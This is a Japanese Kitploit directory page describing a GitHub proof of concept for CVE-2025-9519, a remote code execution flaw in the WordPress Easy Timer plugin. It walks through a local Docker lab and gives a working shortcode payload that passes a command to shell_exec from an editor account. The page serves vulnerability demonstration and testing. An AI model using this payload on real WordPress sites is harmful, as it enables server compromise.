Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Poc-CVE-2025-9519 — CVE-2025-9519の概念実証エクスプロイト。WordPress Easy Timerプラグインにおける、細工されたショートコードフィルターを介したリモートコード実行を実証し、Dockerベースのセットアップを備えています。 | Kitploit
ツール/GitHubGitHub/nimisha17/poc-cve-2025-9519
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubnimisha17/poc-cve-2025-9519

Poc-CVE-2025-9519

CVE-2025-9519の概念実証エクスプロイト。WordPress Easy Timerプラグインにおける、細工されたショートコードフィルターを介したリモートコード実行を実証し、Dockerベースのセットアップを備えています。

リポジトリを見る
2110ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Easy Timer v4.2.1 -

前提条件

  • Docker Engine がインストールされていること
  • Docker Compose がインストールされていること

公式の Docker ドキュメントを参照してインストールしてください: Docker Engine インストール

1. Docker で WordPress を起動する

プロジェクトディレクトリから:

root@kitploit:~
sudo docker-compose up -d
mkdir -p wp-content/plugins
cd wp-content/plugins

wget https://downloads.wordpress.org/plugin/easy-timer.4.2.1.zip
unzip easy-timer.4.2.1.zip

sudo docker compose restart wordpress

2. WordPress をセットアップする

  1. http://localhost:8000/ にアクセスします
  2. WordPress のセットアップを完了します
  3. WordPress ダッシュボード → プラグイン → Easy Timer に移動し、 をクリックします。
有効化
Screenshot from 2025-10-27 12-52-06

3. 編集者権限を持つ新しいユーザーを追加する

プロジェクトディレクトリから次のコマンドを実行します:

root@kitploit:~
docker compose run --rm wpcli user create \
  editoruser [email protected] \
  --role=editor \
  --user_pass=P@ssw0rd!

(注: ユーザー名、メールアドレス、パスワードは任意のものに置き換えてください!)

4. 投稿を作成する

  1. 投稿 → 新規追加 に移動します
  2. ショートコードブロック を挿入し、次のように入力します:
root@kitploit:~
[countdown date=2025/12/17-00:00:00 filter="shell_exec"]ls -l[/countdown]
  1. 更新 → 投稿をプレビュー をクリックして、タイマーが実行されることを確認します。

⚠️ 注: ショートコードが正しく表示されるように、段落ブロックではなく ショートコードブロック を使用していることを確認してください。

Screenshot from 2025-10-27 13-36-40

おめでとうございます。RCE を取得しました。 image

デバッグのヒント

  • 実行中のコンテナを確認する:
root@kitploit:~
sudo docker ps

次のような表示が確認できるはずです:

Screenshot from 2025-10-27 12-51-08
  • ショートコードが 表示されない 場合:

    1. 外観 → テーマ に移動します
    2. Twenty Twenty-Three (または他のデフォルトテーマ) を有効化します。
  • http://localhost:8000/ にアクセスして データベースに接続されていません と表示される場合:

    1. データベースのセットアップが完了するまで 1〜2 分待ちます
ツールをダウンロード